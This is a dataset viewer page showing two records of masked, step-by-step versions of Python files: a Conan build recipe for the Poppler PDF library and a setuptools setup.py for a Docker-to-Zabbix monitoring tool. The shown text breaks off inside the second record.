Columns: code (string, lengths 13 to 6.09M), order_type (string, 2 classes), original_example (dict), step_ids (list, lengths 1 to 5)
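For readability, each record below is rendered as labeled fields (code, order_type, original_example, step_ids). For programmatic access, a minimal loading sketch with the Hugging Face `datasets` library follows; the dataset id `user/masked-code-steps` is a placeholder, not the real identifier.

# Minimal loader sketch; "user/masked-code-steps" stands in for the real dataset id.
from datasets import load_dataset

ds = load_dataset("user/masked-code-steps", split="train")
row = ds[0]
print(row["order_type"])                   # "normal" or "flexible"
print(row["step_ids"])                     # e.g. [6, 7, 8, 9, 11]
print(row["original_example"]["blob_id"])  # provenance id of the code sample

code: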
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
import os
import shutil
class LibpopplerConan(ConanFile):
name = "poppler"
version = "0.73.0"
description = "Poppler is a PDF rendering library based on the xpdf-3.0 code base"
topics = ("conan", "libpoppler", "poppler", "pdf")
url = "https://github.com/zehome/conan-poppler"
homepage = "https://poppler.freedesktop.org/"
author = "Laurent Coustet <[email protected]>"
license = "GPL-3.0-only"
generators = "cmake"
exports_sources = "CMakeLists.txt", "patches/*.diff"
settings = "os", "compiler", "build_type", "arch"
_source_subfolder = "poppler-src"
options = {
"shared": [True, False], "with_lcms": [True, False],
"with_cpp": [True, False], "with_cairo": [True, False],
"with_qt": [True, False], "with_splash": [True, False],
"with_curl": [True, False],
}
default_options = (
"shared=False", "with_qt=False", "with_lcms=False", "with_cpp=False",
"with_cairo=False", "with_curl=False",
#LC: Specific
# "libpng:shared=False",
# "freetype:with_png=False", "freetype:shared=False",
# "freetype:with_zlib=False", "freetype:with_bzip2=False",
# "zlib:shared=False",
# "openjpeg:shared=False",
# "cairo:shared=False",
# "glib:shared=False",
# "libcurl:shared=False", "OpenSSL:shared=False",
"qt:opengl=desktop", "qt:qtxmlpatterns=True", "qt:shared=True",
)
requires = (
"zlib/1.2.11@conan/stable",
"libpng/1.6.36@bincrafters/stable",
"libjpeg/9c@bincrafters/stable",
"openjpeg/2.3.0@bincrafters/stable",
"libtiff/4.0.9@bincrafters/stable",
"freetype/2.9.1@clarisys/stable",
)
def config_options(self):
if self.settings.os == "Windows":
self.options.remove("cairo")
def configure(self):
if self.options.with_lcms:
self.requires.add("lcms/2.9@bincrafters/stable")
if self.options.with_qt:
self.requires.add("qt/5.12.0@clarisys/stable")
if self.settings.os != "Windows" and self.options.with_cairo:
self.requires.add("cairo/1.15.14@bincrafters/stable")
self.requires.add("glib/2.56.1@bincrafters/stable")
if self.settings.os == "Windows" and not self.options.with_splash:
raise ConanInvalidConfiguration("Option with_splash=True is mandatory on windows")
if self.options.with_curl: # TODO: does not link on windows / shared=False
self.requires.add("libcurl/7.61.1@bincrafters/stable")
# if self.settings.os != "Windows":
# self.requires.add("fontconfig/2.13.1@clarisys/stable")
def source(self):
source_url = "https://poppler.freedesktop.org/"
tools.get("{0}/poppler-{1}.tar.xz".format(source_url, self.version))
extracted_dir = self.name + "-" + self.version
if os.path.exists(self._source_subfolder):
shutil.rmtree(self._source_subfolder)
os.rename(extracted_dir, self._source_subfolder)
# TODO: ugly; may need to be replaced by something better
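# Note: the exported CMakeLists.txt presumably wraps the original file
# (renamed to CMakeListsOriginal.txt below) so Conan's generated build
# info can be injected before Poppler's own CMake logic runs.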
os.rename(os.path.join(self._source_subfolder, "CMakeLists.txt"),
os.path.join(self._source_subfolder, "CMakeListsOriginal.txt"))
shutil.copy("CMakeLists.txt",
os.path.join(self._source_subfolder, "CMakeLists.txt"))
def _configure_cmake(self):
cmake = CMake(self)
cmake.verbose = True
cmake.definitions["ENABLE_SPLASH"] = self.options.with_splash
cmake.definitions["ENABLE_ZLIB"] = True
cmake.definitions["BUILD_QT5_TESTS"] = False
cmake.definitions["ENABLE_CPP"] = self.options.with_cpp
cmake.definitions["ENABLE_CMS"] = "lcms2" if self.options.with_lcms else 'none'
cmake.definitions["ENABLE_LIBCURL"] = self.options.with_curl
if self.settings.os == "Windows":
cmake.definitions["LIB_SUFFIX"] = ""
cmake.definitions["FONT_CONFIGURATION"] = "win32"
cmake.definitions["BUILD_SHARED_LIBS"] = self.options.shared
cmake.configure(source_folder=self._source_subfolder)
return cmake
def build(self):
cmake = self._configure_cmake()
#shutil.rmtree(os.path.join(self._source_subfolder, 'cmake'))
cmake.build()
def package(self):
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
cmake = self._configure_cmake()
cmake.install()
# If the CMakeLists.txt has a proper install method, the steps below may be redundant
# If so, you can just remove the lines below
include_folder = os.path.join(self._source_subfolder, "include")
self.copy(pattern="*", dst="include", src=include_folder)
self.copy(pattern="*.dll", dst="bin", keep_path=False)
self.copy(pattern="*.lib", dst="lib", keep_path=False)
self.copy(pattern="*.a", dst="lib", keep_path=False)
self.copy(pattern="*.so*", dst="lib", keep_path=False)
self.copy(pattern="*.dylib", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
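As a usage note, a recipe like this is typically exercised with Conan 1.x's `conan create`; the sketch below shells out to that CLI, with an illustrative user/channel (`zehome/testing` is not from the source):

# Hypothetical smoke test for the recipe above; assumes the Conan 1.x CLI is on PATH.
import subprocess

subprocess.run(
    ["conan", "create", ".", "zehome/testing",
     "-o", "poppler:shared=False", "-o", "poppler:with_splash=True"],
    check=True,
)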
order_type: normal

original_example:
{
"blob_id": "848394e1e23d568f64df8a98527a8e177b937767",
"index": 3380,
"step-1": "<mask token>\n\n\nclass LibpopplerConan(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def config_options(self):\n if self.settings.os == 'Windows':\n self.options.remove('cairo')\n\n def configure(self):\n if self.options.with_lcms:\n self.requires.add('lcms/2.9@bincrafters/stable')\n if self.options.with_qt:\n self.requires.add('qt/5.12.0@clarisys/stable')\n if self.settings.os != 'Windows' and self.options.with_cairo:\n self.requires.add('cairo/1.15.14@bincrafters/stable')\n self.requires.add('glib/2.56.1@bincrafters/stable')\n if self.settings.os == 'Windows' and not self.options.with_splash:\n raise ConanInvalidConfiguration(\n 'Option with_splash=True is mandatory on windows')\n if self.options.with_curl:\n self.requires.add('libcurl/7.61.1@bincrafters/stable')\n <mask token>\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.verbose = True\n cmake.definitions['ENABLE_SPLASH'] = self.options.with_splash\n cmake.definitions['ENABLE_ZLIB'] = True\n cmake.definitions['BUILD_QT5_TESTS'] = False\n cmake.definitions['ENABLE_CPP'] = self.options.with_cpp\n cmake.definitions['ENABLE_CMS'\n ] = 'lcms2' if self.options.with_lcms else 'none'\n cmake.definitions['ENABLE_LIBCURL'] = self.options.with_curl\n if self.settings.os == 'Windows':\n cmake.definitions['LIB_SUFFIX'] = ''\n cmake.definitions['FONT_CONFIGURATION'] = 'win32'\n cmake.definitions['BUILD_SHARED_LIBS'] = self.options.shared\n cmake.configure(source_folder=self._source_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n <mask token>\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n",
"step-2": "<mask token>\n\n\nclass LibpopplerConan(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def config_options(self):\n if self.settings.os == 'Windows':\n self.options.remove('cairo')\n\n def configure(self):\n if self.options.with_lcms:\n self.requires.add('lcms/2.9@bincrafters/stable')\n if self.options.with_qt:\n self.requires.add('qt/5.12.0@clarisys/stable')\n if self.settings.os != 'Windows' and self.options.with_cairo:\n self.requires.add('cairo/1.15.14@bincrafters/stable')\n self.requires.add('glib/2.56.1@bincrafters/stable')\n if self.settings.os == 'Windows' and not self.options.with_splash:\n raise ConanInvalidConfiguration(\n 'Option with_splash=True is mandatory on windows')\n if self.options.with_curl:\n self.requires.add('libcurl/7.61.1@bincrafters/stable')\n\n def source(self):\n source_url = 'https://poppler.freedesktop.org/'\n tools.get('{0}/poppler-{1}.tar.xz'.format(source_url, self.version))\n extracted_dir = self.name + '-' + self.version\n if os.path.exists(self._source_subfolder):\n shutil.rmtree(self._source_subfolder)\n os.rename(extracted_dir, self._source_subfolder)\n os.rename(os.path.join(self._source_subfolder, 'CMakeLists.txt'),\n os.path.join(self._source_subfolder, 'CMakeListsOriginal.txt'))\n shutil.copy('CMakeLists.txt', os.path.join(self._source_subfolder,\n 'CMakeLists.txt'))\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.verbose = True\n cmake.definitions['ENABLE_SPLASH'] = self.options.with_splash\n cmake.definitions['ENABLE_ZLIB'] = True\n cmake.definitions['BUILD_QT5_TESTS'] = False\n cmake.definitions['ENABLE_CPP'] = self.options.with_cpp\n cmake.definitions['ENABLE_CMS'\n ] = 'lcms2' if self.options.with_lcms else 'none'\n cmake.definitions['ENABLE_LIBCURL'] = self.options.with_curl\n if self.settings.os == 'Windows':\n cmake.definitions['LIB_SUFFIX'] = ''\n cmake.definitions['FONT_CONFIGURATION'] = 'win32'\n cmake.definitions['BUILD_SHARED_LIBS'] = self.options.shared\n cmake.configure(source_folder=self._source_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n <mask token>\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n",
"step-3": "<mask token>\n\n\nclass LibpopplerConan(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def config_options(self):\n if self.settings.os == 'Windows':\n self.options.remove('cairo')\n\n def configure(self):\n if self.options.with_lcms:\n self.requires.add('lcms/2.9@bincrafters/stable')\n if self.options.with_qt:\n self.requires.add('qt/5.12.0@clarisys/stable')\n if self.settings.os != 'Windows' and self.options.with_cairo:\n self.requires.add('cairo/1.15.14@bincrafters/stable')\n self.requires.add('glib/2.56.1@bincrafters/stable')\n if self.settings.os == 'Windows' and not self.options.with_splash:\n raise ConanInvalidConfiguration(\n 'Option with_splash=True is mandatory on windows')\n if self.options.with_curl:\n self.requires.add('libcurl/7.61.1@bincrafters/stable')\n\n def source(self):\n source_url = 'https://poppler.freedesktop.org/'\n tools.get('{0}/poppler-{1}.tar.xz'.format(source_url, self.version))\n extracted_dir = self.name + '-' + self.version\n if os.path.exists(self._source_subfolder):\n shutil.rmtree(self._source_subfolder)\n os.rename(extracted_dir, self._source_subfolder)\n os.rename(os.path.join(self._source_subfolder, 'CMakeLists.txt'),\n os.path.join(self._source_subfolder, 'CMakeListsOriginal.txt'))\n shutil.copy('CMakeLists.txt', os.path.join(self._source_subfolder,\n 'CMakeLists.txt'))\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.verbose = True\n cmake.definitions['ENABLE_SPLASH'] = self.options.with_splash\n cmake.definitions['ENABLE_ZLIB'] = True\n cmake.definitions['BUILD_QT5_TESTS'] = False\n cmake.definitions['ENABLE_CPP'] = self.options.with_cpp\n cmake.definitions['ENABLE_CMS'\n ] = 'lcms2' if self.options.with_lcms else 'none'\n cmake.definitions['ENABLE_LIBCURL'] = self.options.with_curl\n if self.settings.os == 'Windows':\n cmake.definitions['LIB_SUFFIX'] = ''\n cmake.definitions['FONT_CONFIGURATION'] = 'win32'\n cmake.definitions['BUILD_SHARED_LIBS'] = self.options.shared\n cmake.configure(source_folder=self._source_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n self.copy(pattern='LICENSE', dst='licenses', src=self._source_subfolder\n )\n cmake = self._configure_cmake()\n cmake.install()\n include_folder = os.path.join(self._source_subfolder, 'include')\n self.copy(pattern='*', dst='include', src=include_folder)\n self.copy(pattern='*.dll', dst='bin', keep_path=False)\n self.copy(pattern='*.lib', dst='lib', keep_path=False)\n self.copy(pattern='*.a', dst='lib', keep_path=False)\n self.copy(pattern='*.so*', dst='lib', keep_path=False)\n self.copy(pattern='*.dylib', dst='lib', keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n",
"step-4": "<mask token>\n\n\nclass LibpopplerConan(ConanFile):\n name = 'poppler'\n version = '0.73.0'\n description = (\n 'Poppler is a PDF rendering library based on the xpdf-3.0 code base')\n topics = 'conan', 'libpoppler', 'poppler', 'pdf'\n url = 'https://github.com/zehome/conan-poppler'\n homepage = 'https://poppler.freedesktop.org/'\n author = 'Laurent Coustet <[email protected]>'\n license = 'GPL-3.0-only'\n generators = 'cmake'\n exports_sources = 'CMakeLists.txt', 'patches/*.diff'\n settings = 'os', 'compiler', 'build_type', 'arch'\n _source_subfolder = 'poppler-src'\n options = {'shared': [True, False], 'with_lcms': [True, False],\n 'with_cpp': [True, False], 'with_cairo': [True, False], 'with_qt':\n [True, False], 'with_splash': [True, False], 'with_curl': [True, False]\n }\n default_options = ('shared=False', 'with_qt=False', 'with_lcms=False',\n 'with_cpp=False', 'with_cairo=False', 'with_curl=False',\n 'qt:opengl=desktop', 'qt:qtxmlpatterns=True', 'qt:shared=True')\n requires = ('zlib/1.2.11@conan/stable',\n 'libpng/1.6.36@bincrafters/stable', 'libjpeg/9c@bincrafters/stable',\n 'openjpeg/2.3.0@bincrafters/stable',\n 'libtiff/4.0.9@bincrafters/stable', 'freetype/2.9.1@clarisys/stable')\n\n def config_options(self):\n if self.settings.os == 'Windows':\n self.options.remove('cairo')\n\n def configure(self):\n if self.options.with_lcms:\n self.requires.add('lcms/2.9@bincrafters/stable')\n if self.options.with_qt:\n self.requires.add('qt/5.12.0@clarisys/stable')\n if self.settings.os != 'Windows' and self.options.with_cairo:\n self.requires.add('cairo/1.15.14@bincrafters/stable')\n self.requires.add('glib/2.56.1@bincrafters/stable')\n if self.settings.os == 'Windows' and not self.options.with_splash:\n raise ConanInvalidConfiguration(\n 'Option with_splash=True is mandatory on windows')\n if self.options.with_curl:\n self.requires.add('libcurl/7.61.1@bincrafters/stable')\n\n def source(self):\n source_url = 'https://poppler.freedesktop.org/'\n tools.get('{0}/poppler-{1}.tar.xz'.format(source_url, self.version))\n extracted_dir = self.name + '-' + self.version\n if os.path.exists(self._source_subfolder):\n shutil.rmtree(self._source_subfolder)\n os.rename(extracted_dir, self._source_subfolder)\n os.rename(os.path.join(self._source_subfolder, 'CMakeLists.txt'),\n os.path.join(self._source_subfolder, 'CMakeListsOriginal.txt'))\n shutil.copy('CMakeLists.txt', os.path.join(self._source_subfolder,\n 'CMakeLists.txt'))\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.verbose = True\n cmake.definitions['ENABLE_SPLASH'] = self.options.with_splash\n cmake.definitions['ENABLE_ZLIB'] = True\n cmake.definitions['BUILD_QT5_TESTS'] = False\n cmake.definitions['ENABLE_CPP'] = self.options.with_cpp\n cmake.definitions['ENABLE_CMS'\n ] = 'lcms2' if self.options.with_lcms else 'none'\n cmake.definitions['ENABLE_LIBCURL'] = self.options.with_curl\n if self.settings.os == 'Windows':\n cmake.definitions['LIB_SUFFIX'] = ''\n cmake.definitions['FONT_CONFIGURATION'] = 'win32'\n cmake.definitions['BUILD_SHARED_LIBS'] = self.options.shared\n cmake.configure(source_folder=self._source_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n self.copy(pattern='LICENSE', dst='licenses', src=self._source_subfolder\n )\n cmake = self._configure_cmake()\n cmake.install()\n include_folder = os.path.join(self._source_subfolder, 'include')\n self.copy(pattern='*', dst='include', src=include_folder)\n self.copy(pattern='*.dll', dst='bin', 
keep_path=False)\n self.copy(pattern='*.lib', dst='lib', keep_path=False)\n self.copy(pattern='*.a', dst='lib', keep_path=False)\n self.copy(pattern='*.so*', dst='lib', keep_path=False)\n self.copy(pattern='*.dylib', dst='lib', keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom conans import ConanFile, CMake, tools\nfrom conans.errors import ConanInvalidConfiguration\nimport os\nimport shutil\n\n\nclass LibpopplerConan(ConanFile):\n name = \"poppler\"\n version = \"0.73.0\"\n description = \"Poppler is a PDF rendering library based on the xpdf-3.0 code base\"\n topics = (\"conan\", \"libpoppler\", \"poppler\", \"pdf\")\n url = \"https://github.com/zehome/conan-poppler\"\n homepage = \"https://poppler.freedesktop.org/\"\n author = \"Laurent Coustet <[email protected]>\"\n license = \"GPL-3.0-only\"\n generators = \"cmake\"\n exports_sources = \"CMakeLists.txt\", \"patches/*.diff\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n\n _source_subfolder = \"poppler-src\"\n\n options = {\n \"shared\": [True, False], \"with_lcms\": [True, False],\n \"with_cpp\": [True, False], \"with_cairo\": [True, False],\n \"with_qt\": [True, False], \"with_splash\": [True, False],\n \"with_curl\": [True, False],\n }\n default_options = (\n \"shared=False\", \"with_qt=False\", \"with_lcms=False\", \"with_cpp=False\",\n \"with_cairo=False\", \"with_curl=False\",\n #LC: Specific\n # \"libpng:shared=False\",\n # \"freetype:with_png=False\", \"freetype:shared=False\",\n # \"freetype:with_zlib=False\", \"freetype:with_bzip2=False\",\n # \"zlib:shared=False\",\n # \"openjpeg:shared=False\",\n # \"cairo:shared=False\",\n # \"glib:shared=False\",\n # \"libcurl:shared=False\", \"OpenSSL:shared=False\",\n \"qt:opengl=desktop\", \"qt:qtxmlpatterns=True\", \"qt:shared=True\",\n )\n\n requires = (\n \"zlib/1.2.11@conan/stable\",\n \"libpng/1.6.36@bincrafters/stable\",\n \"libjpeg/9c@bincrafters/stable\",\n \"openjpeg/2.3.0@bincrafters/stable\",\n \"libtiff/4.0.9@bincrafters/stable\",\n \"freetype/2.9.1@clarisys/stable\",\n )\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n self.options.remove(\"cairo\")\n\n def configure(self):\n if self.options.with_lcms:\n self.requires.add(\"lcms/2.9@bincrafters/stable\")\n if self.options.with_qt:\n self.requires.add(\"qt/5.12.0@clarisys/stable\")\n if self.settings.os != \"Windows\" and self.options.with_cairo:\n self.requires.add(\"cairo/1.15.14@bincrafters/stable\")\n self.requires.add(\"glib/2.56.1@bincrafters/stable\")\n if self.settings.os == \"Windows\" and not self.options.with_splash:\n raise ConanInvalidConfiguration(\"Option with_splash=True is mandatory on windows\")\n if self.options.with_curl: # TODO: does not link on windows / shared=False\n self.requires.add(\"libcurl/7.61.1@bincrafters/stable\")\n # if self.settings.os != \"Windows\":\n # self.requires.add(\"fontconfig/2.13.1@clarisys/stable\")\n\n\n def source(self):\n source_url = \"https://poppler.freedesktop.org/\"\n tools.get(\"{0}/poppler-{1}.tar.xz\".format(source_url, self.version))\n extracted_dir = self.name + \"-\" + self.version\n\n if os.path.exists(self._source_subfolder):\n shutil.rmtree(self._source_subfolder)\n os.rename(extracted_dir, self._source_subfolder)\n # TODO: Ugly.. 
May need to be replaced by something\n # better\n os.rename(os.path.join(self._source_subfolder, \"CMakeLists.txt\"),\n os.path.join(self._source_subfolder, \"CMakeListsOriginal.txt\"))\n shutil.copy(\"CMakeLists.txt\",\n os.path.join(self._source_subfolder, \"CMakeLists.txt\"))\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.verbose = True\n cmake.definitions[\"ENABLE_SPLASH\"] = self.options.with_splash\n cmake.definitions[\"ENABLE_ZLIB\"] = True\n cmake.definitions[\"BUILD_QT5_TESTS\"] = False\n cmake.definitions[\"ENABLE_CPP\"] = self.options.with_cpp\n cmake.definitions[\"ENABLE_CMS\"] = \"lcms2\" if self.options.with_lcms else 'none'\n cmake.definitions[\"ENABLE_LIBCURL\"] = self.options.with_curl\n if self.settings.os == \"Windows\":\n cmake.definitions[\"LIB_SUFFIX\"] = \"\"\n cmake.definitions[\"FONT_CONFIGURATION\"] = \"win32\"\n cmake.definitions[\"BUILD_SHARED_LIBS\"] = self.options.shared\n cmake.configure(source_folder=self._source_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n #shutil.rmtree(os.path.join(self._source_subfolder, 'cmake'))\n cmake.build()\n\n def package(self):\n self.copy(pattern=\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n cmake = self._configure_cmake()\n cmake.install()\n # If the CMakeLists.txt has a proper install method, the steps below may be redundant\n # If so, you can just remove the lines below\n include_folder = os.path.join(self._source_subfolder, \"include\")\n self.copy(pattern=\"*\", dst=\"include\", src=include_folder)\n self.copy(pattern=\"*.dll\", dst=\"bin\", keep_path=False)\n self.copy(pattern=\"*.lib\", dst=\"lib\", keep_path=False)\n self.copy(pattern=\"*.a\", dst=\"lib\", keep_path=False)\n self.copy(pattern=\"*.so*\", dst=\"lib\", keep_path=False)\n self.copy(pattern=\"*.dylib\", dst=\"lib\", keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
step_ids: [6, 7, 8, 9, 11]

code:
#!/usr/bin/env python
import os
import sys
from setuptools import setup
from textwrap import dedent
NAME = "docker-zabbix-script-sender"
GITHUB_ORG_URL = "https://github.com/troptop/"
ROOT_DIR = os.path.dirname(__file__)
SOURCE_DIR = os.path.join(ROOT_DIR)
exec(open('docker_zabbix_script_sender/version.py').read())
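# version.py is expected to define a module-level `version` string
# (e.g. `version = "0.1.0"`); exec() pulls that name into this namespace
# so setup() below can use it.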
setup(
name=NAME,
version=version,
author="Cyril Moreau",
author_email="[email protected]",
url= GITHUB_ORG_URL + '/' + NAME,
download_url="{0}/{1}/tarball/v{2}".format(GITHUB_ORG_URL, NAME, version),
description="Push Docker containers script results to Zabbix efficiently",
long_description=dedent("""
Rationale
---------
Docker Zabbix Sender delivers a daemon script that pushes statistics about Docker containers to Zabbix.
It leverages 3 interesting components:
- Zabbix maintains a tool titled ``zabbix-sender``.
It is meant to push `Zabbix trapper items`_ efficiently.
- Develop your own scripts to monitor your Docker containers
- Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.
It allows the client to subscribe to a live feed delivering container statistics.
The daemon script stands in the middle of those 3 components.
It collects Docker container statistics and transforms them into Zabbix trapper events.
Published metrics
-----------------
The daemon script does not publish any statistics yet.
You have to develop your own script.
Documentation
-------------
The stable documentation is available on ReadTheDocs_
"""),
keywords="docker zabbix monitoring",
packages=['docker_zabbix_script_sender'],
install_requires=[
'docker-py >= 1.0.0',
],
zip_safe=False,
license="Apache license version 2.0",
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Utilities',
'License :: OSI Approved :: Apache Software License',
],
entry_points = """
[console_scripts]
docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run
"""
)
order_type: normal

original_example:
{
"blob_id": "0769003c248c099da5bcd75541d35234b01af5de",
"index": 2723,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
"step-3": "<mask token>\nNAME = 'docker-zabbix-script-sender'\nGITHUB_ORG_URL = 'https://github.com/troptop/'\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
"step-4": "import os\nimport sys\nfrom setuptools import setup\nfrom textwrap import dedent\nNAME = 'docker-zabbix-script-sender'\nGITHUB_ORG_URL = 'https://github.com/troptop/'\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
